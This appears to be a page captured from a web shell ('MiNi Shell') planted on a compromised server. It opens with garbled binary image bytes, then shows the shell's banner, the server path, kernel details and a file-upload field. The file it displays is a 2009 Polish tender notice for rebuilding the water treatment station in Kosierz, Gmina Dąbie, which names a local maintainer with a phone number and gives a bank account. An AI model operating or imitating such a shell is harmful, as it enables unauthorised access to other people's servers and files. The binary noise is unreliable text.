JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20091015/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20091015/179029-N-2009.html

<p class="kh_header"><b>Dąbie: Przebudowa Stacji Uzdatniania Wody w Kosierzu - I Etap, Gmina Dąbie, woj. lubuskie.</b><br>
<b>Numer ogłoszenia: 179029 - 2009; data zamieszczenia: 15.10.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Dąbie , ul. Szeroka 4, 66-615 Dąbie, woj. lubuskie, tel. 068 3835148, faks 068 3832148.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.dabie.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przebudowa Stacji Uzdatniania Wody w Kosierzu - I Etap, Gmina Dąbie, woj. lubuskie..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Zamawiający nie dopuszcza możliwości składania ofert częściowych.
2.0.0  Przebudowa Stacji Uzdatniania Wody w Kosierzu - I Etap obejmuje: 
- prace geologiczne (badania geotechniczne gruntu)
- remont konstrukcji ścian i dachu SUW,                                                                                                        - demontaż urządzeń wodnych istniejącej SUW -  podłączenie tymczasowe do sieci,                                      
- instalację napowietrzania wody,                                                                                                        - filtrację wody,                                                                                                         - instalację sprężonego powietrza. 
    
2.0.1. Ogólna charakterystyka przedmiotu zamówienia.

 Budynek SUW wraz ze studniami głębinowymi zlokalizowany jest  w południowo-zachodniej części miejscowości Kosierz w odległości ok. 150 m od najbliższych zabudowań. Schemat technologiczny zaopatrzenia w wodę wodociągu grupowego wsi Kosierz i Lubiatów przedstawia się następująco:
 - pobór wody ze studni głębinowych agregatami pompowymi typu G,.
 - napowietrzanie wody za pomocą zestawu aeracji, - filtracja wody na zestawie filtracji,
 - magazynowanie wody w zbiorniku stalowym zewnętrznym V = 50 m3 , (Etap II)
- rozprowadzanie wody do sieci zewnętrznej za pomocą zestawu hydroforowego (Etap II).
Źródłem wody dla wodociągu grupowego wsi Kosierz i Lubiatów jest ujęcie wód podziemnych składające się z dwóch studni wierconych oznakowanych nr 1 i nr 2.
	Remont konstrukcji ścian i dachu SUW - zawarty jest w Projekcie Budowlanym, branża: -Plan zagospodarowania, architektura, konstrukcja-, który zawiera:
      - zainstalowanie nowych urządzeń dla technologii uzdatniania wody;
      - budowę zewnętrznego pionowego zbiornika o pojemności V= 50m3 / na wodę  
        uzdatnioną i p-poż/  (Etap II);
   - budowę  wewnątrz istniejącego budynku pomieszczenia chloratorni .                                                                                    	Istniejący budynek hydroforni po przebudowie będzie nadal pełnił rolę obiektu    
budowlanego wewnątrz którego zainstalowane będą urządzenia do uzdatniania wody.
                                                                                
2.1. Uwagi końcowe.
     1)Nazwy własne producentów materiałów zostały użyte jako przykładowe.
2)Możliwe jest zastosowanie produktów innych firm pod warunkiem utrzymania założonych  parametrów jakościowych i uzyskania zgody Inspektora Nadzoru Inwestorskiego.
3)W dokumentacji technicznej w przypadku wskazania znaków towarowych, patentów lub pochodzenia dodaje się wyrazy: lub równoważny.
4)Szczegółowy zakres, ilość, wyszczególnienie zawierają przedmiary robót, stanowiące integralną część niniejszej SIWZ oraz  Projekt budowlany, Specyfikacje Techniczne i SIWZ 
z załącznikami. Załącza się Dokumentację Techniczną na całość zadania a wykonujemy tylko elementy zawarte w przedmiarach, dlatego występują rozbieżności ilościowe w części elementów do wykonania. Obowiązuje zakres robót  podany w przedmiarach.
5) W związku z przewidzianym wynagrodzeniem ryczałtowym, przed złożeniem oferty, Wykonawca zobowiązany jest do szczegółowej analizy projektu budowlanego i przedmiaru robót oraz zalecane jest dokonanie wizji lokalnej terenu budowy, gdyż ewentualne niedoszacowanie ilości robót stanowi ryzyko Wykonawcy. Do budynku hydroforni wstęp wolny po wcześniejszym umówieniu się, na konkretny termin z osobami jn. w pkt. 3 i 4 Rozdział VII SIWZ lub bezpośrednio z konserwatorem hydroforni miejscowości Kosierz - Panem Bolesławem Sławińskim zamieszkałym w Kosierzu (tel.  (068) 3836774), który posiada klucz od hydroforni.
2.2  Wykonawca zobowiązany jest wykonać przedmiot niniejszej inwestycji zgodnie z SIWZ z załącznikami oraz  obowiązującymi przepisami, normami i zasadami wiedzy technicznej, z należytą starannością, dobrą jakością i zachowaniem zasad bezpieczeństwa.
3. Informacja na temat możliwości powierzenia przez wykonawcę wykonania części lub całości zamówienia podwykonawcom (jeżeli dotyczy):
-	Wykonawca odpowiada w pełni wobec Zamawiającego za czynności wykonane przez Podwykonawcę i jego personel oraz osoby z nim współpracujące.
4. Zamawiający nie dopuszcza możliwości składania ofert wariantowych  
5. Przedmiotem niniejszego postępowania nie jest zawarcie umowy ramowej 
6. Zamawiający nie dopuszcza możliwości udzielenia zamówień uzupełniających. 
7. Wymagania stawiane Wykonawcy:
  7.1 Wykonawca jest odpowiedzialny za jakość, zgodność z warunkami technicznymi i jakościowymi opisanymi dla przedmiotu zamówienia.  
  7.2 Wymagana jest należyta staranność przy realizacji zobowiązań umowy,  
  7.3 Ustalenia i decyzje dotyczące wykonywania zamówienia uzgadniane będą przez zamawiającego z ustanowionym przedstawicielem wykonawcy.  
  7.4 Określenie przez Wykonawcę telefonów kontaktowych i numerów fax. oraz innych ustaleń niezbędnych dla sprawnego i terminowego wykonania zamówienia.  
  7.5 Zamawiający nie ponosi odpowiedzialności za szkody wyrządzone przez Wykonawcę podczas wykonywania przedmiotu zamówienia.  
  7.6 Inne:
 - Cena ofert powinna obejmować koszty wykonania całości zamówienia (wraz z kosztami dodatkowymi wszelkich robót przygotowawczych, kosztami uzgodnień, delegacji, organizacji itp.) mimo nie podania ich w przedmiarze robót.
8. Wymagania organizacyjne ---
9. Wymagania dot. gwarancji. Okres gwarancji - 3 lata od chwili przekazania zadania do 
     użytkowania. Okres rękojmi nie może być krótszy niż okres rękojmi za wady budowlane (minimum  3 lata od odbioru  końcowego inwestycji budowlanej wykonanej w oparciu o projekt budowlany stanowiący przedmiot niniejszego postępowania).
10. Zamawiający dopuszcza możliwość zmiany łączącej strony umowy w zakresie:
   10.1 Terminu wykonania zamówienia w przypadku, gdy niedotrzymanie terminu spowodowane jest okolicznościami, których nie można było przewidzieć w chwili jej zawarcia a w szczególności:
- warunkami atmosferycznymi
- klęskami żywiołowymi
- niemożliwymi do przewidzenia warunkami geologicznymi terenu budowy, odmiennymi od
przyjętych w dokumentacji projektowej
- przyczynami zależnymi od Zamawiającego, np. nie terminowe oddanie placu budowy, konieczność usunięcia błędów lub wprowadzenia zmian w dokumentacji projektowej lub specyfikacji technicznej wykonania i odbioru robót;
   10.2 Sposobu spełnienia świadczenia na skutek zmian technologicznych spowodowanych w szczególności następującymi okolicznościami:
1) niedostępność na rynku materiałów lub urządzeń wskazanych w dokumentacji projektowej lub specyfikacji technicznej wykonania i odbioru robót spowodowania zaprzestaniem produkcji lub wycofaniem z rynku tych materiałów lub urządzeń;
2) pojawienie się na rynku materiałów lub urządzeń nowszej generacji pozwalających na zaoszczędzenie kosztów realizacji przedmiotu umowy lub kosztów eksploatacji wykonanego
przedmiotu umowy;
3) pojawienie się nowszej technologii wykonania zaprojektowanych robót pozwalającej na zaoszczędzenie czasu realizacji inwestycji lub kosztów wykonywanych prac, jak również kosztów eksploatacji wykonanego przedmiotu umowy;
4) konieczność zrealizowania projektu przy zastosowaniu innych rozwiązań
technicznych - technologicznych niż wskazane w dokumentacji projektowej lub specyfikacji
technicznej wykonania i odbioru robót, w sytuacji, gdyby zastosowanie przewidzianych rozwiązań groziło niewykonaniem lub wadliwym wykonaniem przedmiotu umowy..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.30.00.00-6, 45.00.00.00-7, 45.32.00.00-6, 45.40.00.00-1, 45.30.00.00-9, 45.41.00.00-4, 45.43.00.00-0, 45.44.00.00-3.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 10.12.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> 1. Zamawiający wymaga wniesienia wadium.
2. Ustala się wadium dla całości przedmiotu zamówienia I Etapu w wysokości: 2.000,00 złotych (słownie złotych: dwa tysiące 00/100).
3. Wykonawca wnosi wadium w wybranej przez siebie, wymienionej poniżej, formie:
3.1) w pieniądzu, przelewem na rachunek bankowy: 
nr 71 1020 5402 0000 0502 0027 8770 PKO BP o/Krosno Odrzańskie
z adnotacją: wadium Kosierz SUW - przetarg, 
3.2) w poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym, że zobowiązanie kasy jest zobowiązaniem pieniężnym,
3.3) w gwarancjach bankowych, 
3.4) w gwarancjach ubezpieczeniowych,
3.5) w poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. Nr 109, poz. 1158, z p. zm.) 
przed upływem terminu składania ofert, sposób przekazania: Dowód wniesienia wadium (jeżeli dotyczy) jako załącznik do oferty. 
Wadium wnoszone w formie innej niż pieniężna dołącza się do oferty w formie oryginału.
Przy czym za termin wniesienia wadium w formie przelewu pieniężnego przyjmuje się termin uznania na rachunku zamawiającego. 
W zakresie wadium obowiązują uregulowania Prawa zamówień publicznych zawarte w art. 45 
i 46.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1. O udzielenie zamówienie mogą ubiegać się wykonawcy potwierdzający spełnienie warunków:
1.1 Posiadający uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;
1.2 Posiadający niezbędna wiedzę i doświadczenie oraz dysponujący potencjałem technicznym 
i osobami zdolnymi do wykonania zamówienia lub którzy przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia.
1.3 Znajdujący się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia;
1.4 Nie podlegający wykluczeniu z postępowania o udzielenie zamówienia.
2. Z ubiegania się o zamówienia publicznego wyklucza się wykonawców, którzy:
2.1 nie spełniają warunków udziału w postępowaniu o zamówienie publiczne z art. 22 Prawa zamówień publicznych opisanych w ppkt. 1.1 do 1.4.
2.2 podlegają  wykluczeniu z postępowania na podstawie art. 24 ust. 1 Prawa zamówień publicznych.
2.3 wykonywali bezpośrednio czynności związane z przygotowaniem prowadzonego postępowania, lub posługiwali się w celu sporządzenia oferty osobami uczestniczącymi 
w dokonywaniu tych czynności chyba, że udział tych wykonawców w postępowaniu nie utrudnia uczciwej konkurencji.
2.4 złożyli nieprawdziwe informacje mające wpływ na wynik prowadzonego postępowania. 
2.5 nie złożyli oświadczenia o spełnianiu warunków udziału w postępowaniu lub dokumentów potwierdzających spełnianie tych warunków lub złożone dokumenty zawierają błędy 
z zastrzeżeniem art. 26 ust. 3 Prawa zamówień publicznych.
  2.6 nie wnieśli wadium, w tym również na przedłużony okres związania ofertą, lub nie zgodzili się na przedłużenie okresu związania ofertą. 
  2.7 Inne podstawy wykluczenia wykonawców
3. Zamawiający odrzuca ofertę jeżeli:
3.1 jest niezgodną z ustawą
3.2 jej treść nie odpowiada treści specyfikacji istotnych warunków zamówienia, z zastrzeżeniem art. 87 ust. 2 pkt. 3 Prawa zamówień publicznych.
3.3 jej złożenie stanowi czyn nieuczciwej konkurencji w rozumieniu przepisów o zwalczaniu nieuczciwej konkurencji 
3.4 zawiera rażąco niską cenę w stosunku do przedmiotu zamówienia,  
3.5 została złożona przez wykonawcę wykluczonego z udziału w postępowaniu o udzielenie zamówienia.
3.6 zawiera błędy w obliczeniu ceny 
3.7 wykonawca w terminie 3 dni od dnia doręczenia zawiadomienia nie zgodził się na poprawienie omyłki, o której mowa w art. 87 ust. 2 pkt 3 Prawa zamówień publicznych 
3.8 jest nieważna na podstawie odrębnych przepisów, 
4. Ofertę wykonawcy wykluczonego uznaje się za odrzuconą
5. Ocena spełnienia warunków udziału w postępowaniu dokonywana będzie w oparciu o dokumenty złożone przez wykonawcę w niniejszym postępowaniu metodą warunku granicznego: spełnia - nie spełnia..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> A. Na ofertę składają się następujące dokumenty i załączniki:

  A.1) Formularz ofertowy - wypełniony i podpisany przez Wykonawcę -załącznik (zal) Nr 1 do SIWZ.
  A.2) Dowód wniesienia wadium (jeżeli dotyczy).
  A.3) Kosztorys ofertowy.

B. W celu potwierdzenia, że wykonawca posiada uprawnienie do wykonywania określonej działalności lub czynności oraz nie podlega wykluczeniu na podstawie art. 24 Prawa zamówień publicznych składa następujące dokumenty:
 
  B.1) Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.  
  B.2) Dokumenty potwierdzające posiadanie uprawnień-pełnomocnictw osób składających ofertę, o ile nie wynika to z przedstawionych dokumentów rejestrowych.  
  B.6) Oświadczenie Wykonawcy o spełnieniu warunków udziału w postępowaniu z art. 22 i 24 Prawa zamówień publicznych - zał. Nr 2 do SIWZ.  
  B.7) Koncesja, zezwolenie lub licencja, jeżeli ustawy nakładają obowiązek posiadania koncesji, zezwolenia lub licencji na podjęcie działalności gospodarczej w zakresie objętym niniejszym zamówieniem publicznym. 
Jeżeli firma posiada koncesje, zezwolenia lub licencje na podjęcie działalności gospodarczej w zakresie objętym zamówieniem to może je załączyć do oferty. Nie dołączenie takich dokumentów nie stanowi przesłanki do odrzucenia oferty.

  C.W celu potwierdzenia spełnienia warunku posiadania przez wykonawcę niezbędnej wiedzy i doświadczenia oraz dysponowania potencjałem technicznym i osobami zdolnymi do wykonania zamówienia należy złożyć następujące dokumenty: 
   
  C.5) Uwaga: Punkt ten dotyczy tylko Wykonawcy (wybranego przez Zamawiającego), który składa wymienione tu dokumenty najpóźniej w dniu podpisania umowy w siedzibie Zamawiającego. 
Dokumenty stwierdzające, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień. 
-  kserokopie lub odpisy uprawnień  w zakresie projektowania i kierowania robotami budowlanymi w występujących tu branżach dla wyznaczonego(-ch) do nadzoru  kierownika(ów) budowy  wraz z aktualnym(-i) zaświadczeniem(-ami) o przynależności do właściwej izby samorządu zawodowego.
       W przypadku składania oferty przez podmioty występujące wspólnie zaświadczenie musi być złożone przez każdy podmiot. 

  D.W celu potwierdzenia spełnienia warunku znajdowania się przez wykonawcę w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia należy złożyć następujące dokumenty: ---

E. Wykonawca zamieszkały poza terytorium Rzeczypospolitej Polskiej:

  E.1) Zamiast dokumentów, o których mowa w pkt. B.1), składa dokument lub dokumenty, wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że:
1) nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 
6 miesięcy przed upływem terminu składania ofert.

  -Jeżeli w kraju pochodzenia osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów wskazanych w niniejszym pkt. E zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania - wystawionych nie wcześniej niż w terminach określonych w niniejszym pkt. E.   

F. Dokumenty wymagane w przypadku składania oferty wspólnej: 

F.1 Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia, w takim przypadku dla ustanowionego pełnomocnika do oferty należy załączyć pełnomocnictwo do reprezentowania w postępowaniu lub do reprezentowania w postępowaniu i zawarcia umowy

  - Oferta winna zawierać: oświadczenia i dokumenty opisane w pkt. B1, B2, B7, dla każdego partnera z osobna, pozostałe dokumenty składane są wspólnie   

  - Inne dokumenty ---

  G. W celu potwierdzenia, że oferowane dostawy, usługi, lub roboty budowlane odpowiadają wymaganiom określonym w niniejszej specyfikacji istotnych warunków zamówienia do oferty należy dołączyć następujące dokumenty: --

H. Postanowienia dotyczące składanych dokumentów

H.1 Wyżej wymienione dokumenty mogą być złożone w formie oryginałów lub kserokopii potwierdzonych za zgodność przez Wykonawcę lub osobę - osoby uprawnione do podpisania oferty z dopiskiem: za zgodność z oryginałem.

H.2 Dokumenty sporządzone w języku obcym są składane wraz z tłumaczeniem na język polski, poświadczonym przez wykonawcę..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.bip.dabie.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Gmina Dąbie, Ulica Szeroka 4   66-615 Dąbie, pokój nr 13 w godzinach urzędowania (Podano w Rozdziale I SIWZ)..</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 05.11.2009 godzina 10:00, miejsce: w siedzibie zamawiającego: 
ulica Szeroka 4   66-615 Dąbie.
pokój nr 2 (Sekretariat) w budynku Urzędu Gminy Dąbie..</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com